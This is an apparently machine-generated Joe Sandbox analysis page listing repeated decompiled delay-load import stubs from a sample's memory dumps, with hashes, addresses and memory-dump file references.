Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c0e204d79b9718fa2c6a701b70ec0c25cec844b50684ce57c20394d2822473b6
Instruction ID: 768c69019d6dad87b99e60f0ad5fd44ee6331bbd04467e8d5f6f9840a14c0974
Opcode Fuzzy Hash: c0e204d79b9718fa2c6a701b70ec0c25cec844b50684ce57c20394d2822473b6
Instruction Fuzzy Hash: 9DB012D526C002AC300C7185BD1DD3A120CC6D1914320800EB4CDE8184E4545D0E4632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8DE, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8DE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x106214c); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 638d21838821829d74bb2fd911298a7c8d39c2e7e64fe77d0348791af9491344
Instruction ID: 4e04c5988475658464f4a63870351d7252656d3ec9c7edaf930922b0543921d9
Opcode Fuzzy Hash: 638d21838821829d74bb2fd911298a7c8d39c2e7e64fe77d0348791af9491344
Instruction Fuzzy Hash: 89B012A526C002AC300C7185BC1DD3A124CC6D2A14320800EB8CDD80C4E4445D084632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8E8, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8E8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062148); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b0afeacc8b4a363f779520c74034bd50d5bd0e6bacea1a9cd4aa4657d2679c4c
Instruction ID: 8f13c6d528ebee771ac4ddc4caa9422d7f3bf54ae5b5ce1a0fe4589c4207694c
Opcode Fuzzy Hash: b0afeacc8b4a363f779520c74034bd50d5bd0e6bacea1a9cd4aa4657d2679c4c
Instruction Fuzzy Hash: 5CB012A526C102AD304C7185BC1DD3A124CC6D1A14320410EB4CDD8084E4445D444632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8F2, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8F2() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062144); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 19404361f06485da7b9c107bd8be5f6de7616785b6c3679421a74f43a6db80d8
Instruction ID: 0f335d173f051ed362bb6f7975a7969abb52b59567bf290f588211ed67f8767f
Opcode Fuzzy Hash: 19404361f06485da7b9c107bd8be5f6de7616785b6c3679421a74f43a6db80d8
Instruction Fuzzy Hash: F5B012A526C002AC300C7185BD1DD3A124CC6D1A14320400EB4CDD8084E4445E054632

Uniqueness

Uniqueness Score: -1.00%

Function 0101D8FC, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101D8FC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bdc4, 0x1062140); // executed
				goto __eax;
			}

0x0101d89b
0x0101d8a3
0x0101d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101D8A3

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9699fdf130d59d446609064e7ee93bbdd053f3c82bc11f4e2fbafa6cbc8dd279
Instruction ID: bf7f62190ed69b9f253faf36e108af5f2160726129acafd05b2e06367f01aeda
Opcode Fuzzy Hash: 9699fdf130d59d446609064e7ee93bbdd053f3c82bc11f4e2fbafa6cbc8dd279
Instruction Fuzzy Hash: A5B012A526C002AC300C7186BC1DD3A124CD6E1A14320400EB4CDD8084E4445D044632

Uniqueness

Uniqueness Score: -1.00%

Function 0101DB01, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DB01() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bde4, 0x1062060); // executed
				goto __eax;
			}

0x0101daaa
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e679e60d1c055890708bb8c71d4ae900a5478995f993ed5c27c44fa9bc2e758d
Instruction ID: d0520e2cbb175bea78c02170d41380ae06440793bc995f002cb0740163a5189c
Opcode Fuzzy Hash: e679e60d1c055890708bb8c71d4ae900a5478995f993ed5c27c44fa9bc2e758d
Instruction Fuzzy Hash: 72B012922AC1026C7008B186BC1DE3F124DE2C0910320410FB0C8C900CE4488C048732

Uniqueness

Uniqueness Score: -1.00%

Function 0101DBC3, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DBC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be44, 0x1062088); // executed
				goto __eax;
			}

0x0101dbcd
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b697d17769024fde4bcc3f89b30f978f26351ed7fd84ed9c49e61100a441c1e
Instruction ID: 6a3f771eac6992bb5d00ad267ee4e5ce170a2371859a58d77b614a32a7e1c4db
Opcode Fuzzy Hash: 1b697d17769024fde4bcc3f89b30f978f26351ed7fd84ed9c49e61100a441c1e
Instruction Fuzzy Hash: 7EB0129637C107BC3108118A7C0EC3B121CE2C0A10320411EB0C5D4004D8584C484131

Uniqueness

Uniqueness Score: -1.00%

Function 0101DBDE, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DBDE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be44, 0x1062090); // executed
				goto __eax;
			}

0x0101dbcd
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c1ddfdaf04b1d0c03f45e4aa6f6e3baf20c3d95134c3b6828e75be4885ac57f
Instruction ID: 4f4c3be57703a8599f0df02880ccf2a70f2de4eb745495f956cf3b72c1011ba7
Opcode Fuzzy Hash: 0c1ddfdaf04b1d0c03f45e4aa6f6e3baf20c3d95134c3b6828e75be4885ac57f
Instruction Fuzzy Hash: 55B0129637C002AC3008519E7C0EE3A121DF2C0A10320401EB0CAC4005D8544C484231

Uniqueness

Uniqueness Score: -1.00%

Function 0101DBE8, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DBE8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be44, 0x106208c); // executed
				goto __eax;
			}

0x0101dbcd
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 41795f4279013e9a31bc72d1fb3a4bcf1ef3847cae244eea9fe2d624fde56450
Instruction ID: 8e43200e599937e689cfdb210520df0d0078598947ae8ba3ef3b4afc5606da50
Opcode Fuzzy Hash: 41795f4279013e9a31bc72d1fb3a4bcf1ef3847cae244eea9fe2d624fde56450
Instruction Fuzzy Hash: DCB0129637C003EC300C518E7C0ED3B122CE2C0A10320810EB4C9C5048D8584C084231

Uniqueness

Uniqueness Score: -1.00%

Function 0101DBFC, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DBFC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be44, 0x1062084); // executed
				goto __eax;
			}

0x0101dbcd
0x0101dbd5
0x0101dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DBD5

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54f7745a616dd28e6035d064fcfce15b3fd2c2bbfa78e210a0f88cd252b97779
Instruction ID: 2f90f02605f6dba9cd7320ca29ee7e7a581e35da16775e4051bcd64927f92e8b
Opcode Fuzzy Hash: 54f7745a616dd28e6035d064fcfce15b3fd2c2bbfa78e210a0f88cd252b97779
Instruction Fuzzy Hash: 86B0129637C003BC300C518E7D0ED3B121CE2C0A10320800EB1C9C4004D8584C054231

Uniqueness

Uniqueness Score: -1.00%

Function 0101DACF, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DACF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bde4, 0x106204c); // executed
				goto __eax;
			}

0x0101daaa
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 560b9687e7b602c5e40428d7ad85fdbdf65c2df212114c51c328ed49e86d8998
Instruction ID: d8e48d0a352024f72c2cd6ffca9d8369f70ea03283274babf85017cd3b86dcda
Opcode Fuzzy Hash: 560b9687e7b602c5e40428d7ad85fdbdf65c2df212114c51c328ed49e86d8998
Instruction Fuzzy Hash: 46B012A226C002EC3008B186BC1DD3F128CC2C0A10320C10FB4C8C904CE44C8D088632

Uniqueness

Uniqueness Score: -1.00%

Function 0101DAD9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DAD9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103bde4, 0x1062050); // executed
				goto __eax;
			}

0x0101daaa
0x0101dab2
0x0101dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DAB2

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 476d74aa2fd4b3c288d90a3c0ddf8154baf7ff6a012479c2266e4dcda3c6b249
Instruction ID: 1379241f974542d1ab7b26b1302bb2118fc8088b37147aabbc7902785b63de27
Opcode Fuzzy Hash: 476d74aa2fd4b3c288d90a3c0ddf8154baf7ff6a012479c2266e4dcda3c6b249
Instruction Fuzzy Hash: 20B0129226C0026C3008B186BD1DE3F124DD2C4914320850FB0C8D900CE4488C098A32

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC24, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DC24() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be64, 0x1062178); // executed
				goto __eax;
			}

0x0101dc2e
0x0101dc36
0x0101dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DC36

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f1aa90d39739436c74f3334bd079456a68abf88bb4f138d9aa13a24cfe466d6d
Instruction ID: f4e3fd0292c2f2451d6a98f0c335d11ff626b47bfd4feef0d7b2fa05f4ff808a
Opcode Fuzzy Hash: f1aa90d39739436c74f3334bd079456a68abf88bb4f138d9aa13a24cfe466d6d
Instruction Fuzzy Hash: 93B0129A26C207BD700C2185BE09D3A132CC3E0B103204A0EB1C4E8004D4845C440531

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC53, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DC53() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be64, 0x106217c); // executed
				goto __eax;
			}

0x0101dc2e
0x0101dc36
0x0101dc3d

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101DC36

Part of subcall function 0101DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101DFD6
Part of subcall function 0101DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101DFE7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 85345bab0c9a71406015efb9ff04e99038dabde4b784d53f1938df0eace3e784
Instruction ID: 36a9677cc82a7f4d5cfded288644576d3f92f56983203befa82fbffdabb0d8d0
Opcode Fuzzy Hash: 85345bab0c9a71406015efb9ff04e99038dabde4b784d53f1938df0eace3e784
Instruction Fuzzy Hash: DBB0129A26C103AC700C6189BC09E3A132CC2E5B10320890EB5C8D8044D4845C040631

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC5D, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0101DC5D() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0101DF59(_t3, _t4, _t8, _t9, _t10, 0x103be64, 0x1062170); // executed
				goto __eax;
			}

0x0101dc2e
0x0101dc36
